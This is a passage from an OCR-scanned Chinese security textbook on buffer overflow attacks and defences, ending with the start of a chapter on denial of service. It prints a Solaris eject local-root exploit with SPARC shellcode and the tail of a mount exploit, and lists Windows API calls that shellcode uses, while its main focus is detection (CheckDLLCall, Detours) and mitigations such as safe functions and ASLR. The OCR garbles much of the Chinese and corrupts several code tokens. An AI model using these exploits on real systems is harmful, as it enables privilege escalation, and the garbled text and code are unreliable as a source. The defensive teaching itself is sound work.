for(i= 0;i< strlen(execshell);it++) 
* (ptrt+) = execshell[i]; 
/ * 填充 shell 机 器 代码 * / 
addr ptr = (long * )ptr; 
for(i=0;i< ((4096- BUFFER SIZE)/4); i++) 
* (addr ptr++) = get esp() + ofs; 
/ * 填充 缓冲 区 地 址 * / 
ptr = (char * )addr ptr; 
* ptr = 0; 
(void)alarm((u int)0); 
execl(PATH MOUNT, "mount", buff, NULL); 
/ * 以 buff 为 参数 ,调用 mount 函数 * / 
} 
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8.4.4 缓冲 区 攻击 实例 For Sun Solaris 2.4 


在 Sun 操作 系统 中 ,软驱 和 光驱 都 是 通过 软件 实现 弹出 的 ,完成 这 个 工作 的 程序 是 
eject。 这 个 应 用 程序 有 缓冲 区 洲 出 漏洞 。Solaris 2. 7 以 前 的 版 本 者 存在 这 个 漏洞 。 下 面 两 
个 程序 都 利用 这 个 漏洞 ,获得 root 权限 。 


/x For Solaris 2.4 */ 
# include < stdio. h> 
# include < stdlib. h> 
# include < sys/types. h> 
# include < unistd. h> 
# define BUF LENGTH 264 
# define EXTRA 36 
# define STACK OFFSET 8 
# define SPARC NOP 0xc013a61c 
u char sparc shellcode[] = 
"\xc0\x13\x2d\x0b\xd8\x9a\xac\x15\xal\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" 
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\xla\x80\x0a\x9c\x03\xa0\x14" 
"\ xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" 
"\ x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" 
"\x91\xd0"/ * \x20\x08" * /; 
u_long get_sp(void) 
{ 
. asm ("mov $% sp, $ i0 \n"); 
} 
void main(int argc, char * argv[]) 
( char buf[BUF LENGTH + EXTRA + 8]; 
long targ addr; 
u long * long p; 
u char * char p; 
int i, code length = strlen(sparc shellcode),dso- 0; 
if(argc > 1) dso=atoi(argv[1]); 
long p = (u long * ) buf ; 
targ addr = get sp() - STACK OFFSET — dso; 
for (i = 0; i< (BUF LENGTH - code length) / sizeof(u long); i++) 
* long p++ = SPARC NOP; 
char p = (u_char *) long p; 
for (i = 0; i< code length; i++) 
* char pt+ = sparc shellcode[i]; 
long p = (u long * ) char p; 
for (i = 0; i< EXTRA / sizeof(u long); i++) 
* long p++ = targ addr; 
printf("Jumping to address 0x $ lx B[ $ d] E[ $d] SO[ %d]\n", 
targ addr, BUF LENGTH, EXTRA, STACK OFFSET); 
execl("/bin/eject", "eject", & buf, (char * ) 0); 
perror("execl failed"); 
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8.5 Windows TEE FZ Ob DX di A XC ior) 30,33 7N 


8.5.1 Windows 下 实现 缓冲 区 溢出 的 必要 条 件 


Windows 系统 中 ,进程 的 段 分 配 ( 主 要 是 堆栈 段 ) 及 系统 的 调用 方式 与 UNIX 系统 差别 
很 大 ,所 以 Windows 中 的 缓冲 区 注 出 的 实现 和 UNIX 系统 也 有 很 大 的 差异 ,而且 难度 更 大 。 
在 Windows 下 要 实现 缓冲 区 溢出 进行 系统 攻击 必须 实现 两 个 条 件 : 山 将 攻击 代码 植 人 有 
特权 的 被 攻击 程序 中 (如 冲击 波 师 虫 要 将 攻击 代码 植 人 循 主 程序 Svchost. exe P); OHE t 
攻击 程序 跳 转 到 植 入 的 攻击 代 人 码 处 执行 。 通 第 是 通过 一 个 或 多 个 字符 串 ( 称 为 洲 出 字符 串 ) 
同时 实现 器, 洲 出 字符 串 是 攻击 者 作为 用 户 数 据 提 供给 被 攻击 程序 的 ,用 来 洲 出 被 攻击 程 
厅 的 缓冲 区 。 通 过 缓冲 区 注 出 进行 系统 攻击 的 关键 就 在 于 溢出 字符 串 的 设计 ,其 中 包括 设 
计 好 的 返回 地 址 和 需要 执行 的 攻击 代码 。 人 返回 地 址 的 设计 影响 看 洲 出 字符 串 格式 的 设计 ， 
而 攻击 代码 的 存放 位 置 需要 根据 返回 地 址 的 设计 来 决定 。 洲 出 字符 串通 常 放 在 被 攻击 程序 
在 堆栈 中 分 配 的 缓冲 区 内 。 洪 出 字符 串 中 也 可 以 存放 多 份 返回 地 址 来 提高 履 盖 函数 返回 地 
址 的 成 功率 。 


8.5.2 Win32 函数 调用 与 Windows 下 缓冲 区 溢出 攻击 的 关系 


洲 出 学 符 串 通常 放 在 被 攻击 程序 在 堆栈 中 分 配 的 缓冲 区 内 ,为 了 实现 攻击 的 目的 ， 
Shellcode 必须 调用 一 部 分 系统 核心 动态 链接 库 提供 的 输出 部 数 (API 图 数 ) ,使 用 API PR 
数 要 求知 道行 调用 了 消 数 的 入 口 地 址 ,这 个 地 址 也 会 随 着 DLL 的 不 同和 DLL 文件 加 载 顺 序 的 
不 同 而 改变 。 为 提高 Shellcode 的 通用 性 ,通常 使 用 Import 表 来 调用 Loadlibrary A O), 
GetproAddress( ) 和 ExitProcess ( ) PA Ži. " 其 他 所 需 的 图 数 的 地 址 则 通过 调用 
LoadlibraryA O 和 GetproAddress() 来 得 到 。 这 种 设计 在 市 来 通用 性 的 同时 需要 一 段 附 加 
的 代码 和 文件 各 ,以 及 函数 名 信息 来 获取 函数 地 址 ,这 在 需要 调用 多 个 DLL 文件 中 的 多 个 
图 数 时 尤其 明显 。 由 于 Shellcode 中 可 执行 代码 存放 在 堆栈 中 ,对 这 些 常 用 函数 的 调用 部 是 
从 堆栈 中 分 配 的 缓冲 区 发 出 的 。 


8.5.3 Win32 函数 截获 和 检测 基本 策略 实现 


PR 2x Wel FEE 75 1 CCheckDLLCalD 的 实现 主要 通过 两 步 来 实现 对 缓冲 区 海 出 攻击 的 
对 抗 : 中 截获 动态 链接 库 中 的 函数 功能 调用 。CheckDLLCall 中 集成 了 很 多 的 动态 链接 库 
图 数 ,每 当 这 些 图 数 锌 调 用 时 ,初始 化 函数 就 会 立即 被 执行 。 包 安全 检查 。 初 始 化 郴 数 检查 
piii signi han AN AR al FAK A E Fe TAS LC UE [n] E Jak HE PLC A A Kb v di R VS] RH OK 

ARIS ,初始 化 函数 就 会 终止 程序 的 执行 并 进行 日 志 记 录 。 
. 监视 函数 功能 调用 

pclae hems Shell (Windows 系列 操作 系统 主要 是 运行 一 个 System 的 
CMD) 打开 一 个 问 口 (开局 一 定 的 服务 )、 修 改 系 统 重要 的 配置 文件 ( 留 下 后 门 ), 或 者 通过 
5X pb des 日 导 ( 如 冲击 波 、SQL slammer, Nimda 和 CodeRed 等 这 样 的 里 
E) ,它们 需要 调用 动 仿 链接 库 的 某 些 图 数 来 实现 它们 的 攻击 目的 。 表 8-2 列 出 了 一 部 分 帝 
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被 调用 的 动态 链接 库 函 数 。 
表 8-2 ”攻击 代码 可 能 调用 的 动态 链接 库 函数 
K 数 名 动态 链接 库 函数 说 明 调用 位 置 


LoadLibraryA Kernel32. dll 获得 DLL 的 句柄 (ASCID) Shellcode 
LoadLibraryW Kernel32. dll 获得 DLL 的 句柄 (Unicode) Shellcode 


CreateProcessA Kernel32. dll 创建 另外 的 一 个 进程 Shellcode 
CloseSocket WS2 32. dll 关闭 一 个 Socket 连接 Shellcode 
WSAStartup WS2 32. dll 初始 化 Winsock DLL Shellcode 


ExitProcess Kernel32. dll 中 止 一 个 进程 Shellcode 
ExitThread Kernel32. dll 中 止 一 个 线程 Shellcode 





GetProcAddress Kernel32. dll 获得 DLL "P PR Seay A O Ht Shellcode 


Shellcode 


CloseHandle 
RegCreateKeyExA 在 指定 项 下 创建 新 项 (或 键 ) Shellcode 
RegCloseKey 关闭 系统 注册 表 中 的 一 个 项 (或 键 ) | — Shellcode 


RegSetValueExA Advapi32. dll 设置 指定 项 的 值 Shellcode 


CheckDLLCall 集成 包括 表 8-2 中 的 大 部 分 攻击 程序 可 能 调用 的 动态 链接 库 函 数 , 这 些 
图 数 能 够 轻易 地 进行 扩展 ,而 扩展 后 的 集合 不 用 重新 加 载 CheckDLLCall 就 能 够 应 用 ,因为 
CheckDLLCall 是 动态 监视 系统 函数 调用 的 。 

从 表 8-2 中 可 以 看 出 ,被 监视 的 图 数 大 部 分 来 目 kernel32. dll, ws2-32. dll, Advapi32. dll 和 
其 他 一 些 动 态 链接 库 , 把 这 些 函 数 调 用 地 址 和 相应 动态 链接 库 的 接口 参数 封 狼 到 男 外 的 库 
中 ,从 封装 库 中 调用 原来 的 动态 链接 库 ,完成 相应 图 数 的 调用 。BOWALL 就 是 使 用 这 种 方 
法 来 监视 库 困 数 的 。 这 种 思路 实现 起 来 有 3 个 缺陷 : CD Windows 2000 不 允许 对 像 
Kernel32. dll 这 样 的 系统 动态 链接 库 的 任何 修改 ; 包 每 个 动态 链接 库 包 合成 日 上 千 的 输出 
图 数 , 如 条 封 闻 代码 要 对 所 有 这 些 输出 图 数 进 行 监 视 , 监 视 代 码 可 能 会 变 得 非常 庞大 ; OE 
波动 态 链接 库 在 系统 更 新 或 应 用 软件 重 沪 后 都 要 重新 小 载 。 

图 8-12 所 示 为 初始 化 函数 插入 一 些 指令 后 的 结构 。IMicrosoft Detours 是 Win32 PR% 
的 二 进 制 监视 的 库 。 它 是 一 个 合适 的 监视 动态 链接 库 困 数 调用 的 工具 ,只 监视 指定 的 函数 
并 且 它 并 不 修改 磁 盘 上 的 映像 而 是 修改 内 存 中 加 载 的 数据 ,所 以 它 能 够 在 运行 的 时 候 动 态 
监视 。 它 用 一 个 指 问 用 户 提 供 的 初始 化 函数 的 跳 转 指令 蔡 代 目标 函数 的 开始 几 条 指令 , 目 
标 孙 数 开始 的 这 几 条 指令 保存 在 初始 化 函数 中 ,这 个 初 妨 化 函数 中 不 仅 包 含 看 从 目标 函数 
中 转移 的 指令 ,而 且 包 含 一 个 指 问 目标 函数 剩余 部 分 的 无 条 件 跳 转 指 令 。 如 图 8-12 所 示 ， 
初始 化 函数 被 植 入 到 调用 路 径 的 源 程序 和 目标 程序 之 间 。 

编程 者 将 安全 检查 代码 放 到 DetourFunction O ) 中 来 检测 图 数 是 否 是 被 恶意 代码 所 调 
用 。 当 通过 调用 TargetFunction OI DetourFunction() 将 想 要 监视 的 函数 注册 后 ,每 当 这 
些 目 标 函 数 被 调用 时 安全 检查 代码 就 会 日 动 执行 。CheckDLLCall 是 作为 一 个 动态 链接 库 
来 实现 的 ,每 当 可 执行 性 文件 将 DIMainO 〇 捆绑 在 自 号 之 上 时 ,监视 就 开始 起 作用 了 。 这 种 
监视 应 该 是 在 整个 系统 范围 内 部 有 效 的 ,这 就 意味 看 这 个 动态 链接 库 应 该 捆绑 到 每 个 匈 受 
到 洲 出 攻击 的 应 用 程序 之 上 ,一 种 实现 方式 是 指定 注册 什 ApplInit_DLLs, 它 能 在 注册 键 
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; 目标 图 效 ; PURER RN 
" TargetFunction: 
TargetFunction: jmp DetourFunction 
push ebp TargetFunction+s: 
mov ebp.esp push edi 
push ebx ... 
push esi ret 
TargetFunction+5: DetourFunction : 
push edi sas 
push ebp 
Ret mov ebp,esp 
push ebx 


push esi 
jmp TargetFunction+5 


图 8-12 在 初始 化 函数 插入 指令 


“HKLM\Software\Microsoft\ Windows NT\CurrentVersion\ Windows” 中 发 现 。 上 所 有 在 这 


个 值 中 指定 的 动态 链接 库 每 当 那 些 与 Kernel32. dll 链接 在 一 起 应 用 程序 启动 时 就 会 被 装 


载 ,很 多 程序 都 与 Kernel32. dll 进行 链接 ,但 是 它们 很 多 都 超出 了 CheckDLLCall 的 保护 


iG II. 
2. 安全 检测 方法 
在 DetourFunction O 中 的 安全 检验 代码 决定 了 一 个 调用 是 否 来 和 目 恶 意 人 代码。 其 他 监视 


关心 的 可 能 是 图 效 的 参数 而 CheckDLLCall 并 不 如 此 ,CheckDLLCall 检验 一 个 调用 者 是 否 
是 正和 背 的 ,而 不 是 确认 上 男 数 的 调用 。 

HERRIE A BERR HEER HP HS pR ROR EHe hE Aa mi a ,劫持 特权 用 户 执 行 权 限 给 已 注入 堆栈 
HA RAS. XE FHE B E P dint Ha IC K OHE fE KS > R AB JE T FI E A SIE s p o Br EA A 
果 一 个 函数 调用 来 自 堆 栈 或 堆 , 那 么 就 可 以 认为 该 调用 是 可 疑 的 ,然后 中 止 它 并 做 好 日 志 
记录 。 

剩 下 的 问题 是 如 何 鉴别 调用 者 是 否 处 在 有 效 的 代码 段 。 在 函数 调用 的 过 程 中 ,只 有 返 
回 地 址 被 压 入 堆栈 ,代码 段 的 值 并 不 被 压 入 堆栈 。 因 此 在 Win32 的 操作 系统 中 ,缓冲 区 洲 
出 攻击 并 不 改变 寄存 器 CS 的 值 , 即 使 这 段 代 码 存 放 在 堆 或 堆栈 区 域 ,寄存 器 CS, DS, SS 的 
值 总 是 相同 的 ,所 以 在 特权 程序 被 攻击 代 但 支持 后 «WESS CS 的 值 仍然 保持 不 变 。 既 然 不 
BE KR AY Eus CS 来 鉴别 调用 者 ,那么 唯一 可 用 的 信息 就 是 返回 地 址 了 。 

汶 出 攻击 将 它们 的 代码 存放 在 堆 或 堆栈 区 域 中 ,返回 地 址 也 被 定位 到 堆 或 堆栈 区 域 。 
所 以 能 够 简单 地 把 返回 地 址 从 内 存 中 该 取 并 回 写 过 去 。 如 果 调 用 者 来 目 代 码 页 , 写 操 作 将 
导致 异 第 ,因为 代码 页 是 只 读 属 性 的 。 而 如 果 调 用 者 来 日 堆 栈 或 堆 , 写 操作 就 会 成 功 完成 ， 
因为 这 些 页 可 以 被 瑟 入 数据 而 无 异常 产生 。 这 样 就 找到 了 一 种 非常 直接 的 进行 检查 的 方 
X ,如果 写 操作 导致 异常 ,那么 这 个 返回 地 址 就 位 于 代码 页 中 ,相应 的 调用 者 是 一 个 正常 的 
应 用 ,否则 ,就 是 一 个 攻击 代码 ,检测 代码 如 下 所 示 。 


push offset ExceptionHandler 

push dword ptr fs:[0] 

mov  fs:[0],esp; // 建 立 异 常 链 
mov ax, RetAddr 
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mov RetAdde, ax ; // 检 测 返 回 地 址 是 否 是 代码 页 ,和 看 没有 发 生 写 异种 , 则 说 明 返 回 地 址 处 在 
// 堆 栈 或 堆 区 域 ; 可 能 是 攻击 ; 代码 对 API 力 数 进行 非法 调用 ,做 好 日 志 


/1 记录 ,并 中 止 程序 运行 . 
mov eax,[esp+ 8]; /7 如果 代码 页 发 生 异 篆 则 执行 
mov esp, eax; / / Vk 52 HE RG AA SEE BE 


pop dword ptr fs:[0]; 


由 于 该 写 操作 异常 是 由 CheckDLLCall A Er 5 E 19. E Wr 3X A £3 36 Wt jc oe. DN 
了 捕 提 这 个 异常 ,CheckDLLCall Æ H IRE 5 26 j^ ^E ZB E Y — b $5 FJ 46H] t 36 Ab PE as 
(SEH) ,并 在 异常 产生 后 将 其 清除 。 

基于 Libe 库 函 数 的 攻击 用 一 个 函数 的 指针 覆盖 返回 地 址 ,没有 任何 一 条 计算 机 指令 在 
堆 或 堆栈 上 存放 与 执行 。CheckDLLCall 通过 检查 堆栈 中 的 返回 地 址 能 够 识别 这 种 情况 。 
正 稼 调用 将 函数 指针 存放 在 代码 区 域 中 ,如 果 一 个 函数 是 被 基于 Libe JE eR Be AY Bod; f 83 Br 
调用 ,那么 堆栈 中 的 返回 地 址 就 被 设置 成 了 该 限 数 的 指针 ,CheckDLLCall 将 堆栈 中 的 返回 
地 址 与 消 数 的 指针 进行 匹配 ,如 果 匹 配 成 功 , 则 说 明 该 调用 来 日 攻击 代码 。 图 8-13 显示 了 
基于 Libe 库 函 数 洲 出 攻击 下 了 郧 数 调用 时 堆栈 和 代码 段 的 内 存 分 配 。 

内 存 高 端 


堆栈 段 | 传递 到 函数 的 参数 
”函数 返回 地 址 IP 
崔 栈 基 址 BP 






代码 段 





| 局 部 变量 缓冲 区 


内 存 低 端 
图 8-13 ”基于 Libc 库 函 数 溢 出 攻击 下 中 数 调用 时 堆栈 段 和 代码 段 的 内 存 分 配 


3. 中 止 程序 并 对 攻击 做 日 志 记 录 

当 攻 击 在 函数 调用 时 被 检测 到 ,CheckDLLCall 中 止 该 程序 的 执行 从 而 中 断 了 攻击 行 
为 。 然 后 它 会 记录 该 事件 及 一 些 详细 信息 ,包括 拦截 时 间 、 应 用 程序 名 .堆栈 中 相关 数据 , 返 
EIP, ESP 和 错误 人 码 等 ,这 样 管理 员 和 软件 开发 商 才 能 分 析 堆 栈 基 于 这 些 信息 开 发 出 相应 
的 补丁 。 


8.6 其 他 组 名 区 次 出 攻击 防范 技术 


面 对 缓 冲 区 溢出 攻击 的 挑战 ,人 们 根据 各 种 攻击 的 机 制 , 提 出 了 各 种 不 同 的 防范 措施 。 
同时 ,人们 根据 已 有 的 研究 成 果 开发 了 很 多 防止 缓冲 区 溢出 的 工具 ,在 程序 开发 的 过 程 中 应 
用 这 些 工 具 对 减少 缓冲 区 溢出 攻击 的 发 生 有 很 大 的 帮助 。 现 在 已 有 的 防范 措施 主要 有 以 下 
JUR. 
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1. 编写 正确 的 代码 

现在 的 缓冲 区 溢出 攻击 之 所 以 泛滥 除了 开发 语言 本 身 和 操作 系统 安全 策略 上 的 缺陷 
外 ,人 为 因素 在 其 中 也 占 了 很 大 的 比重 ,由 于 之 前 人 们 编码 的 安全 意识 不 强 ,或 者 忽略 了 代 
码 的 安全 性 检查 , 留 下 了 安全 隐患 。 提 高 编码 安全 意识 ,消除 缓冲 区 溢出 攻击 中 的 人 为 因 
系 ,能 够 大 大 减少 发 生 此 类 攻击 。 

要 编写 正确 的 代码 ,首先 应 该 尽量 选择 市 有 边界 检查 的 语言 (如 Perl, Python, Java 等 ) 
进行 开发 ; 其 次 在 使 用 C 语言 这 梓 的 开发 语言 的 时 候 要 做 到 尽量 使 用 安全 的 库 银 数 , 而 对 
不 安全 的 调用 需要 进行 必要 的 边界 检查 。 由 于 CC 语言 在 今后 很 长 一 段 时 间 里 仍 是 人 们 程序 开 
发 的 重要 工具 ,因此 将 C 场 言 中 的 非 安全 图 数 及 其 相应 的 解决 方案 通过 表 8-3 提供 给 大 家 。 


表 8-3 C 标 准 库 中 的 非 安 全 函数 及 其 危险 性 .解决 方案 


Gets 使 用 fgets(buf, size, stdin) 

Strepy 建议 使 用 strncpy 函数 

Strcat 建议 使 用 strncat PRZX 

Sprintf 建议 使 用 snprintf 图 数 ,或 者 使 用 精度 说 明 符 
Scanf 建议 使 用 精度 说 明 符 ,或 者 自己 解析 

Sscanf 建议 使 用 精度 说 明 符 ,或 者 自己 解析 

Fscanf 建议 使 用 精度 说 明 符 ,或 者 自己 解析 

Viscant 建议 使 用 精度 说 明 符 ,或 者 目 己 解析 

Vsprintf 建议 使 用 vsnprintf, 或 者 使 用 精度 说 明 符 
Vscanf 建议 使 用 精度 说 明 符 , 或 者 自己 解析 

Vsscant 建议 使 用 精度 说 明 符 ,或 者 自己 解析 

Streadd 保证 分 配 的 目的 参数 大 小 是 源 参数 的 4 售 
Strecpy 保证 分 配 的 目的 参数 大 小 是 源 参 数 的 4 信 
Strtrns 应 该 加 入 检查 代码 ,查看 目的 大 小 是 否 至 少 和 源 字符 串 相 等 
Realpath 进行 手工 参数 检查 确保 输入 的 参数 不 超过 MAXPATHLEN 
Syslog 把 所 有 的 字符 串 输 入 截 成 合理 大 小 

Getopt 把 所 有 的 字符 串 输入 截 成 合理 大 小 
getopt_long 把 所 有 的 字符 串 输入 截 成 合理 大 小 

Getpass jE PA EP) FIT BB a A S MEK h 

Getchar 若 在 循环 中 使 用 此 函数 ,应 该 检查 缓冲 区 边界 
Fgetc 若 在 循环 中 使 用 此 函数 ,应 该 检查 缓冲 区 边界 
Getc 若 在 循环 中 使 用 此 函数 ,应 该 检查 缓冲 区 边界 
Read 若 在 循环 中 使 用 此 函数 ,应 该 检查 缓冲 区 边界 
Bcopy 保证 缓冲 区 的 大 小 与 声明 的 大 小 相等 

Fgets 保证 缓冲 区 的 大 小 与 声明 的 大 小 相等 
Memcpy 保证 缓冲 区 的 大 小 与 声明 的 大 小 相等 
Snprintí 保证 缓冲 区 的 大 小 与 声明 的 大 小 相等 
Strccpy 保证 缓冲 区 的 大 小 与 声明 的 大 小 相等 

Strcadd 保证 缓冲 区 的 大 小 与 声明 的 大 小 相等 
Strncpy 保证 缓冲 区 的 大 小 与 声明 的 大 小 相等 
Vsnprintf 保证 缓冲 区 的 大 小 与 声明 的 大 小 相等 
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为 了 编写 安全 代码 , 除 人 为 注意 以 外 ,还 能 依 助 一 些 现 有 的 工具 ,如 使 用 源 代 码 扫 摘 工 
H. PurifyPlus ,可 以 玫 助 发 现 程序 中 可 能 导致 缓冲 区 洲 出 的 部 分 。 

2. 非 执 行 的 缓冲 区 

回顾 前 面 所 介绍 的 内 容 , 会 发 现 除 了 基于 LIB 库 的 缓冲 区 洲 出 攻击 外 ,所 有 其 他 的 攻 
击 方式 之 所 以 得 从 ,下 是 由 于 操作 系统 赋予 了 缓冲 区 可 执行 的 属性 。 取 消 缓冲 区 的 可 执行 
性 属性 ,虽然 可 能 会 引起 操作 系统 的 变化 ,但 却 能 有 效 坎 制 缓 冲 区 溢出 攻击 。 

3. 数组 边界 检查 

通常 ,通过 对 输入 的 或 将 要 传 给 函数 的 字符 串 长 度 进行 相应 检查 ,就 能 够 从 根本 上 杜绝 
发 生 洲 出 ,也 就 是 杜绝 了 发 生 缓冲 区 洲 出 攻击 。 这 就 要 求 编 程 者 有 很 强 安全 意识 ,并 能 在 编 
码 过 程 中 真正 做 到 对 所 有 可 能 造成 洲 出 的 地 方 进 行 严格 的 边界 检查 ,但 往往 很 难 做 到 。 

为 了 减轻 编程 者 的 操作 量 , 人们 开发 了 很 多 的 工具 来 进行 数组 边界 的 检查 ,和 常见 的 有 
Richard Jones, Compaq C 编 详 玫 ,以 及 由 Paul Kelly 开发 的 gcc 补丁 ,用 于 对 C 程序 完全 的 
数组 边界 检查 。 

4. 加 强 对 返回 地 址 的 保护 

返回 地 址 是 在 绥 冲 区 汶 出 的 攻击 中 扮演 很 重要 角色 的 ,攻击 者 通 稼 需 借 助 对 它 的 修改 
使 程序 转 问 选 定 的 库 子 数 或 执行 预先 植 和 人 的 恶意 人 代码。 那么 ,通过 在 系统 其 他 地 方 备份 正 
确 的 返回 地 址 ,然后 在 返回 前 对 这 两 者 进行 检查 就 能 够 成 功 阻 断 攻 击 。 

5. 从 系统 级 加 强 对 空间 分 配 的 管理 

通过 缓冲 区 六 出 的 原理 可 以 得 出 现在 的 操作 系统 对 所 分 配 的 内 存 空 间 的 管理 还 不 完 
善 。 本 方法 主张 为 每 个 分 配 的 内 存 空间 增加 起 始 和 终止 地 址 (或 起 始 地 址 和 所 分 配 长 度 ) 属 
性 ,在 每 次 对 相应 的 空间 进行 操作 时 ,操作 系统 根据 这 两 个 属性 对 其 进行 越界 检查 。 虽 然 增 
加 这 两 个 属性 势必 会 增加 系统 的 开销 ,但 相对 现在 系统 的 硬件 性 能 来 说 ,用 户 甚 至 不 会 感觉 
到 系统 性 能 的 变化 。 利 用 这 种 方法 可 以 从 根本 上 杜绝 缓冲 区 洲 出 攻击 的 发 生 , 可 以 将 程 厅 
员 从 缓冲 区 溢出 的 防护 工作 中 彻底 解脱 出 来 。 

6. 及 时 打 补 丁 或 升级 

经 第 关注 网 上 公布 的 补丁 和 软件 升级 信息 ,这 对 那些 经 党 上 网 的 用 户 来 说 是 一 种 简单 
有 效 的 防范 措施 。 

7. 掌握 系统 正在 运行 的 进程 信息 

掌握 系统 正在 运行 的 进程 信息 对 普通 用 户 来 说 要 求 比较 高 ,要求 用 户 对 系统 的 各 种 正 
第 进程 有 大 体 的 了 解 。 用 户 通 过 了 解 系 统 中 正在 运行 的 进程 ,可 以 及 时 地 发 现 可 疑 进 程 并 
及 时 终止 其 运行 ,从 而 降低 遭受 攻击 的 风险 。 

8. 地 址 空间 随机 化 

地 址 空间 随机 化 是 一 种 改变 程序 运行 时 候 的 内 存 空间 分 布 已 达到 系统 安全 的 增强 拉 
术 。 黑 客 如 果 利 用 程序 缓冲 区 溢出 漏洞 控制 系统 , 则 需要 筷 握 程序 运行 时 候 的 内 存 空间 分 
布 , 然 后 去 修改 程序 调用 了 靖 数 时 返回 地 址 的 值 。 如 琳 能 使 程 厅 在 内 存 中 分 配 地 址 或 返回 地 
址 无 法 事先 确定 ,就 能 迫使 黑客 攻击 程序 难以 准确 定位 Shellcode 的 位 置 , 从 而 可 以 降低 攻 
击 成 功 的 概率 。 
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8.7 本 革 小 结 


缓冲 区 洲 出 攻击 是 撑 程 网 络 攻击 的 主要 方式 ,使 攻击 者 有 机 会 获得 一 全 主机 的 部 分 或 
全 部 的 控制 权 。 目 前 的 程序 音 遇 存在 狂 洞 ,缓冲 区 攻击 已 成 为 网 络 系统 安全 的 重要 威胁 ,其 
攻击 效 来 明显 。 本 章 就 缓冲 区 淤 出 攻击 拉 术 的 原理 进行 了 详细 讨论 ,并 给 出 了 各 种 操作 系 
统 平台 攻击 代码 编 与 的 实例 ,以 加 深 读者 对 绥 冲 区 次 出 攻击 原理 的 理解 ,最 后 介绍 了 目前 缕 
冲 区 洲 出 攻击 的 第 见 防范 拉 术 方法 。 


习题 8 


. EE mp K ii h JEE, 

. 简 述 对 缓冲 区 溢出 的 理解 。 

. 分 别 说 明 几 种 不 同类 型 缓冲 区 攻击 的 实现 原理 。 

. 搜集 不 同 缓冲 区 溢出 类 型 的 实例 。 

.举例 说 明 Windows 操作 系统 缓冲 区 浇 出 攻击 的 防范 技术 。 

. PGA Win32 函数 调用 与 Windows 下 缓冲 区 溢出 攻击 的 关系 。 


拒绝 服务 攻击 与 防范 第 9 章 


本 草 将 对 拒绝 服务 攻击 进行 讨论 ,这 里 的 拒绝 服务 攻击 特 指 基于 网 络 连 
接 而 进行 的 一 种 攻击 方式 。 广 义 而 言 , 一 些 其 他 类 型 的 攻击 如 口令 的 破解 、 
非法 访问 等 ,如 采 因 为 网 络 的 安全 性 不 够 局 ,导致 其 原 有 用 户 不 再 或 不 慑 继 
续 使 用 相应 的 服务 ,也 可 以 称 为 拒绝 服务 攻击 ,但 这 不 是 本 章 探讨 的 内 容 。 


9.1 拒绝 服务 攻击 概述 


9.1.1 拒绝 服务 攻击 的 概念 


在 谈 拒 绝 服务 攻击 之 前 ,首先 从 服务 开始 谈 起 。 服 务 是 指 系 统 提供 的 ， 
用 户 在 对 其 使 用 的 过 程 中 会 受益 的 功能 。 任 何 对 服务 的 干涉 如 果 使 得 其 可 
用 性 降低 或 失去 可 用 性 均 称 为 拒绝 服务 。 如 果 一 个 计算 机 系统 朋 演 ,或 者 其 
市 宽 耗 义 , 或 者 其 人 硬盘 被 十 满 , 导致 其 不 能 提供 正 篆 的 服务 ,就 构成 拒绝 
服务 。 

拒绝 服务 (DoS) 攻 击 是 指 攻击 者 通过 某 种 手段 ,有 意 地 造成 计算 机 或 网 
络 不 能 正常 运转 从 而 不 能 回合 法 用 户 提供 所 需要 的 服务 或 使 得 服务 质量 降 
低 。Dos 攻击 广义 是 指 任何 导致 被 攻击 的 服务 器 都 不 能 青 提 供 正常 服务 的 
攻击 方式 。Dos 攻击 是 指 攻 击 网 络 协 议 实 现 的 缺陷 或 通过 各 种 手段 耗 尽 被 
攻击 对 象 的 资源 ,以 使 得 被 攻击 计算 机 或 网 络 无 法 提供 正常 的 服务 ,直至 系 
统 停止 啊 应 甚至 骨 泪 的 攻击 方式 。 

分 布 式 拒绝 服务 (DDoS) 与 拒绝 服务 (DoS) 攻 击 是 有 区 别 的 ,分 布 式 拒绝 
服务 (DDoS) 攻 击 是 指 如 果 人 处 于 不 同位 置 的 多 个 攻击 者 同时 问 一 个 或 数 个 日 
标 发 起 攻击 ,或 者 一 个 或 多 个 攻击 者 控制 了 位 于 不 同位 置 的 多 台 计 算 机 并 利 
用 这 些 计 算 机 对 受害 者 同时 实施 攻击 。 由 于 攻击 的 发 出 点 是 分 布 在 不 同位 
置 的 ,因此 这 类 攻击 称 为 分 布 式 拒绝 服务 攻击 。 

典型 的 DDoS 中 ,攻击 者 可 以 有 多 个 。 一 般 来 说 ,DDos 攻击 与 DoS 攻击 
没有 本 质 上 的 区 别 , 除 了 规模 方面 以 外 。 严 格 而 言 ,DDoS 攻击 是 DoS 攻击 
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的 一 种 ,一 个 或 数 个 攻击 者 控制 下 的 分 处 于 不 同 网 络 位 置 的 多 个 攻击 主机 一 同 发 起 的 协同 
攻击 称 为 DDoS 攻击 。 

DDoS 攻击 中 率 涉 的 各 方 称 为 DDoS 网 络 , 它 由 攻击 者 .控制 人 台 、 攻 击 主机 和 受害 者 组 
成 。 多 个 控制 台 可 以 被 一 个 攻击 者 所 控制 ,而 多 个 攻击 主机 也 可 以 被 一 个 控制 台 控 制 。 为 
了 达到 攻击 效果 ,受害 者 往往 只 有 一 个 ,如 果 有 多 个 也 是 有 紧密 联系 的 多 个 ,如 同一 个 组 织 
机 构 的 网 络 或 多 台 服 务 硕 。 

DDoS 攻击 与 DoS 攻击 比较 ,广义 而 言 ,DDos 攻击 是 DoS 攻击 的 一 种 ,狭义 而 言 ,DosS 
是 指 传统 的 拒绝 服务 攻击 ,也 就 是 单一 攻击 者 针对 单一 受害 者 的 攻击 。 而 DDoS 攻击 具有 
攻击 来 源 的 分 敌 性 和 攻击 力度 的 汇聚 性 的 特点 ,因为 多 个 攻击 者 可 以 问 同 一 个 受害 者 发 起 
攻击 。 所 以 它 的 攻击 力度 很 大 ,也 正 因为 如 此 才 被 称 为 相对 较 新 的 拒绝 服务 攻击 。DDos 
攻击 想 要 委 效 还 是 需要 规模 的 ,如 SYN KÆ UDP 风 雁 等 ,如 果 只 是 需要 几 个 数据 包 就 能 
奏效 的 攻击 ,虽然 也 可 以 采用 分 布 式 方 式 , 但 这 时 候 的 “分 布 式 ? 却 没 有 什么 实质 的 意义 , 因 
